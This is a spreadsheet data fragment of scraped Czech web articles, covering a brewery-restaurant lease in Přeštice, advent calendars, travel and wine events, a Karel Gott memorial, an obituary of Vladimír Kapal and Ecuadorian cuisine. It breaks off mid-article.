    <t>Chtěli byste žít život jako v&amp;nbsp;Postřižinách? Nyní se váš sen může změnit ve skutečnost Provozovat pivovar je sen nejednoho muže. Mít u pivovaru vlastní restauraci je v případě, že umíte uvařit dobré pivo , trefa do černého. Já vám dnes představím místo, kde svůj sen můžete proměnit ve skutečnost. Nestává se často, aby se na trhu objevila nabídka pronájmu restaurace a pivovaru. Ale jedna taková nabídka tu je. Přichází z jednoho malého městečka v Plzeňském kraji , které se nachází na hlavním tahu mezi Klatovy a Plzní. Město Přeštice vyhlásilo výběrové řízení na provozování restaurace s pivovarem U Přeška. Restaurace je pěkná, nachází se na náměstí přímo v centru městečka. Nejnižší nabídkové nájemné je také „za hubičku“. Město požaduje minimální měsíční nájemné 20 000,-Kč. Jen jednu nevýhodu tato nabídka má. Provozovatel restaurace musí mít živnost na provozování pivovaru nebo se musí domluvit s někým, kdo může pivovar provozovat. Sama jsem nabídku města zvažovala a do výběrového řízení bych se snad i přihlásila, kdybych nemusela provozovat pivovar. Restaurace má pěkný interiér, dostatek prostoru a nechybí jí kouzlo, které každá restaurace nemá. Restaurace U Přeška navíc byla jedním ze zastavení v pořadu České televize Příběhy starých hospod. Povědomí o restauraci tak není zrovna malé. Asi se divíte, proč tento článek píšu. Je to jen pár dní, kdy jsem publikovala nelichotivou recenzi právě z této restaurace. Můj článek si přečetlo hodně lidí a obrátil se na mne i zastupitel města pan Martin Rybár, který mne poprosil, zda bych městu pomohla šířit povědomí o hledání nového provozovatele této restaurace a pivovaru. Sama v restauraci vidím velký potenciál a věřím, že když se restaurace dostane do správy někomu, kdo provozování restaurace rozumí, bude mít skvělé výsledky. Právě proto jsem prosbu pana Rybára vyslyšela a napsala jsem tento článek. Musíme si pomáhat. Restaurace U Přeška není špatná. Jen byla do dnešního dne provozována někým, kdo provozu restaurace buď nerozuměl, nebo mu bylo úplně jedno, jaké jídlo podává. Za to ovšem sama restaurace nemůže. Vím, že život jako ve filmových Postřižinách provozovatel restaurace a pivovaru U Přeška mít nebude. Doba se od natáčení filmu změnila. Ale i přesto si jeden jediný člověk může splnit sen a začít provozovat pivovar s restaurací a trošku se životu jako ve filmu přiblížit. Sama pevně věřím, že se takový člověk najde a do výběrového řízení se přihlásí. A až bude restaurace s novým vedením opět v provozu, i přes svou nehezkou zkušenost se do restaurace opět vrátím a zjistím, co se změnilo.</t>
  </si>
  <si>
    <t>20241101_189_3244361669_f95bd581cdae008a4270.html</t>
  </si>
  <si>
    <t>f95bd581cdae008a4270</t>
  </si>
  <si>
    <t>Adventní kalendáře pro muže 2024</t>
  </si>
  <si>
    <t>Adventní kalendáře pro muže 2024 Lis 01 2024 Každý rok ( i loni ) přinášíme inspirativní tipy na adventní kalendáře pro muže, a ani v roce 2024 tomu nebude jinak. Udělejte svému manželovi nebo příteli radost a zpestřete mu čekání na Štědrý den zábavným objevováním. Vybrali jsme několik kalendářů, které nás nadchly. br&amp;gt; Böker Plus adventní kalendář 2024 Sestav si nůž Haddock Objevte kouzlo adventního období s unikátním adventním kalendářem Boker Haddock! Tento výjimečný kalendář je ideálním dárkem pro nadšence do nožů, kteří ocení jak špičkovou kvalitu, tak radost z postupného sestavování vlastního kapesního nože. Za každým okénkem najdete jednu z celkových 24 součástek, díky nimž si v průběhu prosince můžete krok za krokem sestavit nůž inspirovaný legendárním designem Haddock. Koupit můžete zde. Böker Plus adventní kalendář 2024 Sestav si nůž Vousatý kalendář 2024 Jedinečný adventní kalendář pro vousáče! Vydal ho e-shop Luxusní-holení.cz ve spojení se známými barber značkami. 24 pečlivě vybraných produktů pánské kosmetiky nejen pro péči o vousy. V adventním kalendáři najdete především produkty na vousy – několik olejů, balzámů, mýdlo, šampon, kondicionér a hřeben. K tomu jsou přidány také deodorant, sprchový gel, zubní pasta a další oblíbené produkty od značek jako Noberu, Bluebeards Revenge, Angry Beards , Pan Drwal, Hey Joe, OSMA, Byjome, Pasta del Capitano a dalších. Vše je krásně zabaleno v luxusní dárkové kazetě s magnetickým zavíráním. Podle výrobce obsahuje kalendář produkty v hodnotě přibližně 6000 Kč. Koupit můžete zde. Vousatý kalendář 2024 Rumový kalendář 2024 24 pečlivě vybraných rumových vzorků v lahvičkách o objemu 20 ml, které vám zpříjemní každý prosincový den až do Štědrého dne. Dánští experti ze skupiny 1423 sestavili tuto kolekci z rozmanitých koutů světa. Ochutnáte sladké i suché rumy, s vyšším i nižším obsahem alkoholu . Exkluzivní výběr s elegantním balením obsahuje také 2 degustační skleničky a bloček na zápisky – ideální pro opravdové milovníky rumu. Koupit můžete zde. Rumový adventní kalendář 2023 Whiskey adventní kalendář Deluxe 2024 Premiérová edice adventního kalendáře pro ty nejnáročnější milovníky whisky. Elegantní design, pečlivě zpracované etikety inspirované původními verzemi, a hlavně neuvěřitelný obsah! S výběrem šel výrobce na maximum. Kdybyste jen věděli, jaké skvostné whisky tento kalendář skrývá… 🙂 Nechte se překvapit. Rozhodně nebudete litovat. Koupit můžete zde. Whiskey adventní kalendář 2024 Adventní kalendář s Ginger Shoty Originální adventní kalendář plný 24 druhy skvělého sušeného masa. Obdarovaný se může těšit třeba na signature Biltong Originál, zauzený Chiptole, Pepř, Zázvor, Chilli, Teriyaki, nebo Kebab, zvěřinu a další poklady. Prostě 20 gramů blažené radosti v každém sáčku na každý den. To vše v krabici z poctivého kusu borovice. Koupit můžete zde. Adventní kalendář s Ginger Shoty Adventní kalendář s výběrovou kávou 2024 Zpříjemněte si adventní čas výjimečnou kávou s každým otevřeným okénkem! Adventní kalendář s výběrovou kávou 2024 nabízí každodenní kávové překvapení z pečlivě vybraných kávových zrn z celého světa. Každý den vás čeká nový šálek plný chutí, který potěší i ty nejnáročnější milovníky kvalitní kávy. Koupit můžete zde. Adventní kalendář s výběrovou kávou 2024 Nevybrali jste si? Plno dalších typů na adventní kalendáře najdete na Heureka.cz. Jméno (povinné) E-mail - nebude zveřejněn (povinné) Webové stránky Trackback URL for this entry Kategorie Dárky Doplňky Dovolená Dárky Doplňky Dovolená Gastronomie Móda &amp;amp; Oblečení Nezařazené Parfémy Psací potřeby Šperky &amp;amp; hodinky Zážitky Štítky Největší e-shop s luxusními psacími potřebami na českém internetu. Vše pro klasické "mokré" holení najdete na e-shopu Luxusní holení.cz Široký sortiment kvalitních nožů od kapesních až po kuchyňské. Širokou nabídku zubních past a dalších produktů pro ústní hygienu najdete na eshopu NaZuby.cz . Autor: Michal Byrtus Autor person Michal Byrtus</t>
  </si>
  <si>
    <t>20241101_19_3264825531_7a75b1792895c878d974.html</t>
  </si>
  <si>
    <t>7a75b1792895c878d974</t>
  </si>
  <si>
    <t>Skryté klenoty Českého ráje pro milovníky obytných vozů</t>
  </si>
  <si>
    <t>Skryté klenoty Českého ráje pro milovníky obytných vozů 01.11.2024 Redakce Český ráj, oblast, která uchvacuje svou jedinečnou přírodou a historickými památkami, se stává stále oblíbenějším cílem pro karavanisty a majitele obytných aut. Tímto článkem se podíváme na některá z nejzajímavějších míst, která stojí za to navštívit, a která nabízejí nejen krásné výhledy, ale i možnost pořádně si odpočinout. Tato část naší země skrývá mnohé poklady, které jsou ideální pro kempování a výlety s rodinou nebo přáteli. Krajina skal a historických památek Jedním z nejzajímavějších aspektů Českého ráje je jeho rozmanitost. Tento region je proslulý svými pískovcovými skalami, které přitahují nejen turisty, ale také horolezce. Například skalní město Hrubá Skála se pyšní impozantními útvary, kde se návštěvníci mohou projít po značených stezkách a obdivovat nádherné výhledy. Nezapomenutelné jsou i starobylé zříceniny hradů, které se rozprostírají po krajině. Vizuální zážitek umocňuje fakt, že každá část tohoto území má své vlastní kouzlo a odlišný charakter. Věděli jste, že Český ráj je domovem jedné z nejstarších vzduchových tureckých kamenných hradů v Evropě ? Tato historická stavba, zvaná Trosky, se tyčí nad okolní krajinou jako majestátní strážce minulosti. Karavanisté mohou snadno najít vhodné parkovací plochy poblíž, což umožňuje bezproblémový přístup k tomuto ikonickému místu. Relaxace a dobrodružství na dosah Ačkoli je Český ráj známý svou přírodní krásou, nabízí také celou řadu komplexních služeb pro karavanisty. Mnoho kempů je vybaveno moderními zařízeními, jako jsou sprchy, toalety a elektrické přípojky. Tyto komfortní možnosti zajišťují, že se návštěvníci mohou po náročném dni stráveném objevováním skalních útvarů a hradů důkladně zrelaxovat. V některých kempech dokonce najdete možnosti pronájmu kol, což otevírá další možnosti pro objevování. Přírodní okrasy jako Malá Skála nebo Klokočské skály nabízejí výborné podmínky pro pěší turistiku, horolezectví, ale i vodní sporty. V blízkosti některých tábořišť lze nalézt malebné řeky, kde je možné si zapůjčit loď nebo vyzkoušet paddleboard. Tyto aktivity přidávají na atraktivitě a činí z Českého ráje ideální místo pro aktivní dovolenou. Gastronomie a místní tradice Dalším lákadlem Českého ráje je bohatá gastronomie. Lokální restaurace a farmy nabízí čerstvé produkty, které jsou typické pro tuto oblast. Návštěvníci si mohou dopřát chutné pokrmy z regionální kuchyně, jako jsou žampiony nebo klobásy, které doplňuje sklenice výborného vína nebo piva z místních pivovarů. Tato kombinace pohody, chutí a krásné přírody činí z každého pobytu v Českém ráji nezapomenutelný zážitek. Kromě toho, region je proslulý několika tradičními slavnostmi, které se konají během roku a které přitahují široké spektrum návštěvníků. Účast na těchto akcích obohacuje zážitek z výletu a umožňuje lepší porozumění místní kultuře. Dávno zanechané tradice zde ožívají, a tak karavanisté dostávají příležitost poznat Český ráj z jiné perspektivy. Autor: Redakce</t>
  </si>
  <si>
    <t>30</t>
  </si>
  <si>
    <t>20241101_190_3244085105_b751d8346c87a9a6bd92.html</t>
  </si>
  <si>
    <t>b751d8346c87a9a6bd92</t>
  </si>
  <si>
    <t>Svatomartinské saunování v Holicích</t>
  </si>
  <si>
    <t>Svatomartinské saunování v Holicích Tato akce již proběhla a není tedy aktuální. Prohlédněte si aktuální akce v okolí této již neaktuální akce, prozkoumejte aktuální akce v regionu Pardubický kraj nebo navštivte Pobyty a akční nabídky v celé ČR . Co je lepšího než se nechat hýčkat teplem sauny a k tomu si vychutnat lahodná svatomartinská vína ? Zveme vás do Saunového ráje Holice na Svatomartinské saunování, kde se propojí příjemný relax s neobvyklým gurmánským zážitkem. Svatomartinský program v Saunovém ráji Holice : 16:30 – Ochutnávka svatomartinských vín Sommelier Martin Špráchal vám představí čtyři mladá svatomartinská vína z vinařství Šoman , která vynikají svěžestí a ovocnými tóny. 17:00 – 19:00 – Saunové ceremoniály Saunamistři Jirka a Ilona vás provedou speciálními ceremoniály plnými tepla, vůní a relaxace. Při ceremoniálech v 18:00 a 19:00 si opět vychutnáte víno . 20:00 – Peeling v parní kabině Ilona pro vás připravila vinný peeling, díky kterému ze sauny odejdete s hladkou a svěží pokožkou. Přijďte se zklidnit, zahřát a zároveň ochutnat, jak se letošní mladá vína povedla. Letos si můžete svatomartinské víno vychutnat už od pátku 8. listopadu, ani my tedy nebudeme čekat do pondělí 11.11. A pokud vám vína zachutnají, můžete si je zakoupit a odnést s sebou domů. Pro zajištění pohodlí si můžete rezervovat místo na ochutnávce, za malý poplatek vám rezervujeme volnou šatní skříňku. Ochutnávka bude probíhat v odpočívárně wellness. Oslavte svatého Martina stylově!</t>
  </si>
  <si>
    <t>75770</t>
  </si>
  <si>
    <t>20241101_191_3244078727_d6ef8eb83f3a6046868f.html</t>
  </si>
  <si>
    <t>d6ef8eb83f3a6046868f</t>
  </si>
  <si>
    <t>Kulturní akce - Svatomartinské chutnání mladého vína</t>
  </si>
  <si>
    <t>Kulturní akce - Svatomartinské chutnání mladého vína v pátek 15.11. 2024 v 18.00 hodin v KD Vytvořeno: 1. 11. 2024 Autor: Autor: || Autor: | Knihovna přihlášení || Obec Boršice</t>
  </si>
  <si>
    <t>166</t>
  </si>
  <si>
    <t>243</t>
  </si>
  <si>
    <t>20241101_192_3244079244_6bf5497a8078a376d8d4.html</t>
  </si>
  <si>
    <t>6bf5497a8078a376d8d4</t>
  </si>
  <si>
    <t>Tisíc andělů pro Karla Gotta: Vdova Ivana proměnila dary fanoušků ve vzpomínkové dílo</t>
  </si>
  <si>
    <t>Tisíc andělů pro Karla Gotta : Vdova Ivana proměnila dary fanoušků ve vzpomínkové dílo 1. listopadu 2024 · Celebrity · Šárka Blahoňovská Ivana Gottová a Karel Gott . (Zdroj: Frekvence 1) Fanoušci Karla Gotta v průběhu pěti let po jeho smrti nosili na hrob sošky andělíčků jako vyjádření úcty a lásky k ikoně české hudby. Ivana Gottová nyní všechny tyto dary proměnila v umělecké dílo, které připomíná zpěvákův odkaz a vzájemné propojení s jeho příznivci. Na pražských Malvazinkách tak mohou návštěvníci nově spatřit bronzový strom poskládaný právě z těchto andělíčků. Hrob Karla Gotta se stal během let nejen místem vzpomínek, ale i symbolem propojení zpěváka s jeho fanoušky. Ti k němu od zpěvákovy smrti přinášeli různé dary, zejména sošky andělíčků, které představovaly jejich lásku a obdiv k ikoně české populární hudby. Vdova Ivana Gottová se rozhodla tento projev úcty uctít neobvyklým způsobem. Po letech plánování odhalila umělecký objekt na Gottově hrobě, který je tvořen právě z andělíčků, jež zde fanoušci zanechávali. Víkendový speciál: Podzimní cyklo tipy od Jiřího Ježka. Kde spojíte víno s kolem a kde jsou pekelné kopce? Bronzový strom, který pro Ivanu vytvořil akademický sochař Rony Plesl , nyní zdobí místo posledního odpočinku Karla Gotta . Ivana přiznala, že zpočátku neměla jasnou představu o podobě sochy a chtěla se vyhnout možnému kýči. Výsledné dílo, které nese název Tisíc andělů pro Karla Gotta , má zůstat jako vzpomínka na zpěvákovo spojení s jeho příznivci. Příspěvek sdílený Karel Gott Agency (@karelgottagency) Vedle bronzového stromu byla zasazena bříza, kterou Gottová vybrala symbolicky podle písně Kdo tě bílá břízo svléká, kterou Karel Gott nazpíval. Celé dílo je doplněno o QR kód, který návštěvníkům umožňuje poslechnout si tuto píseň přímo na místě. Součástí památníku jsou i lavičky. Listopadové tradice a svátky: Čas vzpomínek, úcty a oslav Ivana Gottová ve svém vzkazu dodala, že bronzový strom „uchovává dotyk každého anděla“, který byl na hrob přinesen. „Snad vás tedy potěší, že se andělé vrátili tam, kam patří, zpátky ke Kájovi,“ uvedla s tím, že umělecké dílo bude trvale připomínat zpěvákův odkaz. Autor: Šárka Blahoňovská Autor person Šárka Blahoňovská Rubrika transition_slide Celebrity</t>
  </si>
  <si>
    <t>7510</t>
  </si>
  <si>
    <t>25740</t>
  </si>
  <si>
    <t>20241101_193_3302427691_0e3bdb6beb09d4cbb823.html</t>
  </si>
  <si>
    <t>0e3bdb6beb09d4cbb823</t>
  </si>
  <si>
    <t>VYZNAMENÁNÍ NA HRADĚ zapili významní hosté nejlepšími víny z Moravy a Čech</t>
  </si>
  <si>
    <t>VYZNAMENÁNÍ NA HRADĚ zapili významní hosté nejlepšími víny z Moravy a Čech 1 listopadu, 2024 Recepce na Pražském hradě se zúčastnila tisícovka hostů Na předávání státních vyznamenání prezidentem 28. října ani letos nechyběla vína z Moravy a vína z Čech . Ve Španělském sále Pražského hradu si zhruba tisícovka hostů mohla vychutnat celkem devět vín. A to z aktuální kolekce Salonu vín. Vína na slavnostní akci věnoval Vinařský fond. „Pro Vinařský fond je velkou poctou, že může oceněným lidem na slavnostním ceremoniálu nabídnout výběr ze stovky nejlepších vín naší země. Těší nás, že už jde o tradici. Naše vinařství má více než tisíciletou historii a naše vína jsou proto tím správným nápojem pro takový okamžik,“ řekl ředitel Vinařského fondu Zbyněk Vičar. Fond vína nakoupil ze Salonu vín, který spravuje Národní vinařské centrum. To zajistilo i jejich náležitou prezentaci na místě. „Jsme velmi rádi, že si i letos si chvilku na ochutnání našel pan prezident. U vína jsme si popovídali například se Zlatou Adamovskou a Petrem Štěpánkem , Ladislavem Špačkem,“ popsal výjimečné okamžiky ředitel Národního vinařského centra Lubomír Maťák. Vybíralo se nejlepší z nejlepšího i průřez odrůdami Prezident ČR a ředitel Národního vinařského centra Národní sommeliérka Klára Kollárová Výběr toho nejlepšího ze Salónu vín Vína na hradě hostům rozlévali zástupci vinařství v čele s národní someliérkou Klárou Kollárovou. „Selekce byla, jak je již zvykem, z vín Salonu vín ČR. Josef a Marek Svobodovi představili své rosé, zatímco Petra a Kamil Prokešovi nabídli svou Frankovku. Bílá vína zastupovaly hlavně naše typické odrůdy. A to Veltlínské zelené, Müller Thurgau, Ryzlink vlašský, Ryzlink rýnský a Pálava. Následovalo rosé a tři červená,“ uvedla k akci v Senátu národní sommelierka Klára Kollárová. „U příležitosti státního svátku České republiky a předávání státních vyznamenání jsme měli tu čest reprezentovat výběr Salonu vín Frankovkou 2021, pozdní sběr, která je zařazena mezi 100 nejlepších vín České republiky , uvedl Kamil Prokeš , majitel stejnojmenného vinařství ve Velkých Pavlovicích . “Bylo nám ctí se této slavnostní recepce zúčastnit. A mám radost, že tu naše víno ochutnalo mnoho významných a známých osobností, kteří ocenili vysokou úroveň nabízených vín.“ Vinný lístek na slavnostní recepci na Pražském hradě zahrnoval Veltlínské zelené 2021, pozdní sběr ze Zámeckého vinařství Bzenec , Müller Thurgau 2022, pozdní sběr z vinařství Znovín Znojmo, Ryzlink vlašský 2022, pozdní sběr z vinařství Mikrosvín Mikulov, Ryzlink rýnský 2021, pozdní sběr z Víno Mikulov , Pálava 2022, výběr z hroznů z vinařství Štěpán Maňák. Dále André rosé 2022. Za červená pozdní sběr z Vinařství Svoboda, Frankovka 2021, pozdní sběr z vinařství Kamil Prokeš , Alibernet 2021, pozdní sběr z vinařství Stanislav Konečný a Cabernet Moravia 2021, výběr z hroznů z Vinařství U Kapličky. Autor: - || Online redakce || | || | | Online redakce | -</t>
  </si>
  <si>
    <t>5630</t>
  </si>
  <si>
    <t>6200</t>
  </si>
  <si>
    <t>20241101_194_3264508039_5bf78cde625e0a2c7b81.html</t>
  </si>
  <si>
    <t>5bf78cde625e0a2c7b81</t>
  </si>
  <si>
    <t>Objev kouzlo vánoční Bratislavy</t>
  </si>
  <si>
    <t>Objev kouzlo vánoční Bratislavy Vánoční trhy Bratislava Autor ▪ komerční sdělení Vánoční trhy v srdci Bratislavy Největším lákadlem adventního období v Bratislavě jsou bezpochyby Vánoční trhy , které se každoročně konají na trojici půvabných historických náměstí – Hlavním, Františkánském a Hviezdoslavově. Trhy se zařadily mezi 10 nejlepších vánočních trhů v Evropě . Dřevěné stánky ozdobené světly nabízejí tradiční slovenské dobroty jako zelňačku, cikánskou pečeni nebo bramborové placky a výběr medoviny, punče či svařeného vína , kde prodejci závodí u směsi nejvoňavějších koření. Kromě tradičních trhů můžete objevovat i Vánoční tržnici ve Staré Tržnici, která je známá svou unikátní nabídkou uměleckých a řemeslných výrobků. Najdete zde zejména ručně vyráběné dárky, dekorace a suvenýry, které oživí sváteční atmosféru a přinesou kousek Bratislavy i k vám domů. Krásy na každém rohu Bratislava je i o krásných místech, na která budete ještě dlouho vzpomínat. Chcete-li zažít vánoční trhy z jiné perspektivy, věž Staré radnice je tou nejlepší volbou, která určitě nezklame. Nedaleko trhů, přímo v srdci starého města, najdete i množství malebných uliček, které vás zavedou do romantických zákoutí a k Michalské bráně . Ta je jedním z nejznámějších symbolů Bratislavy a během adventu spolu s krásným osvětlením vytváří romantickou kulisu. Je tu i možnost nahlédnout do věže na vrcholu brány a naplno si vychutnat vánoční atmosféru z výšky. Vánoční romantika Bratislava se během zimy mění v okouzlující místo, kde každý kout města dýchá vánoční atmosférou. Mimo Staré město na druhé straně Dunaje najdete Winter Wonderland , světelný zábavní park, který je jak vystřižený z pohádky. Je ideálním místem pro procházku nebo výlet, kde se děti i dospělí ponoří do světa pohádkových světel a kreativních instalací. Dalším nezapomenutelným zážitkem jsou adventní plavby po Dunaji . Z lodě se vám naskytne nádherný výhled na Bratislavský hrad, Staré město či osvětlené nábřeží a během plavby si navíc můžete dopřát skvělou večeři. Je to krásná a klidná alternativa k vánočnímu ruchu na náměstích, kde si můžete v pokoji užít romantiku vánočních světel. Kromě adventních plaveb si můžete vychutnat i speciální silvestrovskou plavbu , která bude skvělou tečkou za starým rokem. Zimní kouzlo na hradě Bratislavský hrad je během zimy jedním z nejhezčích míst, na která se můžete vydat. Kromě dech beroucího výhledu na město se v tomto období na hradě pravidelně organizují různé akce, jako jsou výstavy, koncerty nebo i středověké řemeslné trhy . Ty vás přenesou nazpět do 14. století a přiblíží život obyčejných lidí z dávných dob. Jednou z nejvyhledávanějších částí adventního programu jsou i koncerty Slovenské filharmonie . Vánoční koncert vám přinese neopakovatelný hudební zážitek a naladí vás na sváteční náladu. Pro ty, kteří si chtějí užít konec roku v Bratislavě , je ideální volbou Silvestrovský koncert , a jestliže zůstáváte déle, určitě nezmeškejte ani Novoroční koncert , který je každoročně oblíbenou tradicí. Zima na talíři Bratislava během zimy nabízí množství gastronomických zážitků, které stojí za to. Mnohé místní restaurace a kavárny připravují v tomto období speciální menu, které kombinuje tradiční slovenská jídla s moderními chutěmi. V kombinaci s kvalitním slovenským vínem nebo medovinou se tyto speciality postarají o skutečně autentický zážitek. Nezapomeňte však ani na pečené kaštany, které se v tomto období prodávají na každém rohu spolu se svařeným vínem . Zimní Bratislava je ideální destinací pro ty, kteří hledají sváteční atmosféru v komornějším prostředí, kde se dá vyhnout masám turistů. Na rozdíl od větších metropolí si uchovává svoji útulnost a přátelskou atmosféru. Každý krok vás zavede k novým objevům – přes různé kulturní a hudební zážitky, které jsou neodmyslitelnou částí místního adventního programu až po výstavy současného umění a skvělé divadlo, operu a balet. Realizované s finančnou podporou Ministerstva cestovného ruchu a športu Slovenskej republiky . Text nevyjadřuje názor redakce Tento článek máte je zdarma. Když si předplatíte HN, budete moci číst všechny naše články nejen na vašem aktuálním připojení . Vaše předplatné brzy skončí. Předplaťte si HN a můžete i nadále číst všechny naše články. Nyní první 2 měsíce jen za 40 Kč. Veškerý obsah HN.cz Možnost kdykoliv zrušit Odemykejte obsah pro přátele Ukládejte si články na později Všechny články v audioverzi + playlist za 40 Kč nebo za 80 Kč Navíc mobilní aplikace a web bez reklam Autor: Economia, a.s. || K účtu služby se nepodařilo přihlásit. Zkuste prosím opakovat. Rubrika transition_slide PR</t>
  </si>
  <si>
    <t>114740</t>
  </si>
  <si>
    <t>20241101_195_3244037327_b4a5351d1af395b1c044.html</t>
  </si>
  <si>
    <t>b4a5351d1af395b1c044</t>
  </si>
  <si>
    <t>Vladimír Kapal odchází po Babylonském mostě</t>
  </si>
  <si>
    <t>Vladimír Kapal odchází po Babylonském mostě V noci na čtvrtek tohoto týdne zemřel v Neratovické nemocnici Vladimír Kapal, šéfredaktor Svobodného rádia. Vladimír Kapal. Zdroj: Facebook Příčinou úmrtí Vladimíra Kapala byla těžká mozková mrtvice, kterou prodělal na sklonku léta a od té doby se jeho stav nezlepšoval. Následující měsíce byl odkázán na přístroje. Jeho partnerka Soňa Zikmundová mě ještě v tomto týdnu ujišťovala, že alespoň vnímá, i když nemůže reagovat. Cítil jsem z jejích slov nejen smutek, ale i naději. Teď už zbyl jen ten smutek. Vladimír Kapal byl velmi podstatnou postavou naší tzv. alternativní mediální scény. Založil a po celá léta vedl internetové Svobodné rádio . Kromě toho, že za celou dobu existence odvysílal stovky obsáhlých rozhovorů s mnoha významnými lidmi naší doby, v jeho archivu najdete i tematizované pořady o české historii, zejména o národním obrození. Kapal byl člověkem, jehož bychom mohli jednoduše nazvat přesvědčeným vlastencem. Byl jsem mnohokrát respondentem Kapalových pořadů. Konaly se po Skypu (Kapal žil ve Staré Boleslavi ), ale vyznačovaly se jednou, v jiných médiích víceméně nevídanou vlastností: Povídání s Vladimírem Kapalem bylo velmi příjemné. Měl klidný hlasový projev, empatický a zároveň košatý slovník, v jeho pořadu jsem se cítil jako doma – v klidu, pohodě a porozumění. Jistěže si Vladimír Kapal zval své hosty podle toho, jak blízko názorově k nim měl, ale na to měl svaté právo. Nikdo mu za jeho práci neplatil, natož aby byl v nějakém politickém nebo ekonomickém žoldu. Jednoduše řečeno, pán na penzi si umínil, že bude ještě pro společnost užitečný. A protože byl novinář, činil to skrze své rádio. Měli jsme s panem Vladimírem tichou dohodu. On vždy své cca 90timinutové rozhovory v půlce proložil hudební oddechovkou. Shodli jsme se na tom, že naší společnou hudební, literární a historickou láskou je Karel Kryl . Od té doby jsem vždy v té pauze mezi slovy slýchal citlivě vybírané Krylovy písně, a to jak z toho klasického období, tak i, a za to panu Kapalovi patří velký dík, i z Krylových posledních desek, napsaných už po návratu z emigrace zpátky domů. Tyhle písničky, ať už v satirické rovině, nebo takříkajíc na vážno vyjadřovaly Krylovo zklamání z toho, kam se naše země otočila po převratu, kdy měla příležitost vybudovat skutečnou demokracii, a ne jen její karikaturu. Karel Kryl za toto zjištění de facto zaplatil životem. V roce 1994 podlehl těžkému infarktu, bylo mu pouhých padesát let. Justiční martyrium Vladimír Kapal hlavně v posledních letech (od srpna 2020) také vedl svůj boj s režimem. Byl tehdy odsouzen za pořad věnovaný katyňskému masakru. Přesněji řečeno za názory, které v tom pořadu zazněly. Přišla odvolání, i k Nejvyššímu i Ústavnímu soudu. Všechna marně. Jak napsala ČTK , „Podle Nejvyššího soudu daný čin (rozuměj: vyslovený názor, pozn. pž.) vybočil z rámce běžných projevů, jejichž cílem je nalezení pravdy o historických událostech“. Podle mínění Nejvyššího soudu „společenská škodlivost jednání obviněných je o to vyšší v dnešní době, když za poslední roky se výrazně zvyšuje míra rozšiřování dezinformací, jimiž se podporuje a prohlubuje nedůvěra v demokratický právní stát.“ To doslova zaznělo v rozhodnutí Nejvyššího soudu . Asi nejsem sám, komu se příčí soudit lidi za názory. Názory se mají vyvracet, argumentovat v diskusi, o níž TGM pravil, že bez ní není demokracie. Zde došlo, a zdaleka ne poprvé, k odsouzení člověka za vyslovení názoru. A protože naše země je ve stavu, kdy se oponentní názory nevyvracejí, nýbrž jejich nositelé se ostrakizují případně odsuzují, nedošlo samozřejmě k tomu, k čemu by i dojít mělo, totiž že by nositel jednoho názoru Vladimír Kapal byl veřejně konfrontován (třeba ve veřejnoprávních médiích, které to mají podle zákona povinností) s nositelem odlišného názoru. To by byla demokracie. A nebylo by nutné hovořit, jak za starých časů, o „společenské škodlivosti“. Vladimír Kapal odnesl tuto kauzu zdravím a jistě to přispělo i k oné smutné události. Položí si v té souvislosti někdo otázku po svědomí? Pustil jsem si dnes ke psaní této vzpomínky jednu Krylovu píseň. Jmenuje se Babylon . Když si přečtete její text, napadne vás, že ta slova nezní v této souvislosti ani trochu náhodou. Karel Kryl – Babylon Když hrdost s prasaty se válí na kompostě, v korytě perly jsou a nouze v podhradí, jdu s tebou, plešatý, po babylonském mostě, pod bledou kulisou na temném pozadí, Tvá ruka chvěje se, snad strachem nebo touhou, v podpaží zvlhla jsi, jen chvíli od klína, na špatné adrese, kde kdekdo chce být slouhou, kde všichni souhlasí a každý proklíná, Ach, lásko, co se s námi stalo, vždyť blbství zívající nám véčka prstů vzalo i světlá světla svící, a správci staronoví dál v kalné vodě loví, zvuk mincí mezi slovy, co říci, co říci, co říci? Amora bez luku už překřičely žestě, v hospůdce se sloupy si se mnou víno dej, vedu tě za ruku po babylónském městě, ty nejsi ke koupi, já nejsem na prodej. Autor: Petr Jemelka Autor person Petr Jemelka Rubrika transition_slide Výchozí</t>
  </si>
  <si>
    <t>3690</t>
  </si>
  <si>
    <t>15750</t>
  </si>
  <si>
    <t>20241101_196_3378297467_70b794835079c56e3cb3.html</t>
  </si>
  <si>
    <t>70b794835079c56e3cb3</t>
  </si>
  <si>
    <t>Poznejte svět skrze jídlo – Ekvádor</t>
  </si>
  <si>
    <t>Poznejte svět skrze jídlo – Ekvádor Vydáno 1. 11. 2024 | Letuška.cz Redakce Připravte se s Letuškou na cestu plnou exotických chutí a kulinářských překvapení! Ekvádorská kuchyně Nehledě na to, že Ekvádor je relativně malá země, disponuje 84 vulkány, 4 000 druhy orchidejí a amazonským pralesem s přibližně dvaceti různými etnickými skupinami, přičemž každá z nich má unikátní jazyk a kulturu. Neméně výrazná je i kulinářská scéna země. Agachaditos Termín “agachaditos” (dosl. „přikrčení“) označuje malé stánky s jídlem a způsob, jakým si lidé v Ekvádoru užívají pouliční jídlo. Tyto stánky jsou obvykle vybavené nízkými plastovými židlemi a stolky, takže zákazníci jedí v mírně skrčené pozici. V hlavním městě Quitu se pouliční jídlo nabízí takřka všude, ale na výraznější koncentraci takových stánků narazíte v podvečerních hodinách v Parque de las Tripas ve čtvrti La Floresta nebo u trhů Mercado Central (na okraji historického centra), Mercado Iñaquito a Mercado Santa Clara. Některé pochutiny možná nevypadají ani nevoní jako nejlákavější jídlo na světě – například tripa mishqui. Tento recept z kořeněných a grilovaných kravských střev, obvykle podávaný s bramborami, však patří k nejoblíbenějším pouličním jídlům v Ekvádoru . Kulinářskou dobrotou původem ze středověkého Španělska , jsou „větrné empanadas“ ( empanadas de viento ), které jsou plněné sýrem, lehce nafouknuté jako obláčky a posypané moučkovým cukrem. Křupavým, žlutozeleným kuličkám se říká bolones de verde a jde o tradiční pokrm z nezralého banánu, který se uvaří, rozmačká a smíchá s různými ingrediencemi, jako je sýr nebo maso. Někteří historici tvrdí, že tento recept je afrického původu a je stále velmi populární na Kubě , kde se mu říká fufú de platano. Co se týče sýru, stojí za ochutnání queso de hoja neboli “sýr z listů”, což je tradiční čerstvý sýr, typický pro provincie Cotopaxi a Pichincha. Tento sýr se vyrábí v období dešťů ze surového kyselého kravského mléka a místních fermentů, což mu dodává autentickou chuť a strukturu. Quito a Guayaquil Na ulicích Quita si určitě všimnete llapingachos, bramborových placek plněných rozpuštěným sýrem, které se podávají s vejcem, salátem z cibule, rajčat a avokáda nebo vepřovou kůrkou. Mezi oblíbené pokrmy patří také jídla z kukuřice, například humitas, což je tradiční pokrm podobný tamales. Připravuje se ze sladké kukuřice, cibule a koření smíchaných se smetanou. Výsledkem je lahodná, hustá a krémová 